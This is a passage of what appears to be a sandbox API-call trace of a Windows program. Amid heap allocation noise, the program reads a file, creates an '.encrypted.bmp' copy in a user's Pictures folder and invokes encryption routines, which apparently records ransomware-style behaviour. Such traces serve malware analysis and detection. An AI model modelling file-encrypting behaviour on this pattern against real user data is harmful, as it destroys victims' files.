[0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.031] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0041.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0041.032] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0")) returned 0x10 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.032] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.033] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\dlVzwDk.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\dlvzwdk.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0041.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.033] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.034] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0041.034] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.034] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xece8, lpOverlapped=0x0) returned 1 [0041.037] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xece8) returned 0xac2018 [0041.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0041.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0041.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xece8) returned 0xad0d08 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xece8) returned 0xac2018 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0041.040] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.040] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xece8) returned 0xac2018 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0041.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xece8) returned 0x935008 [0041.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0041.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0041.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0041.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0041.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0041.043] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0041.043] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.043] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0041.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0041.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0041.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.044] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0041.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0041.044] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0041.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0041.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0041.045] HeapFree (in: hHeap=0x770000, 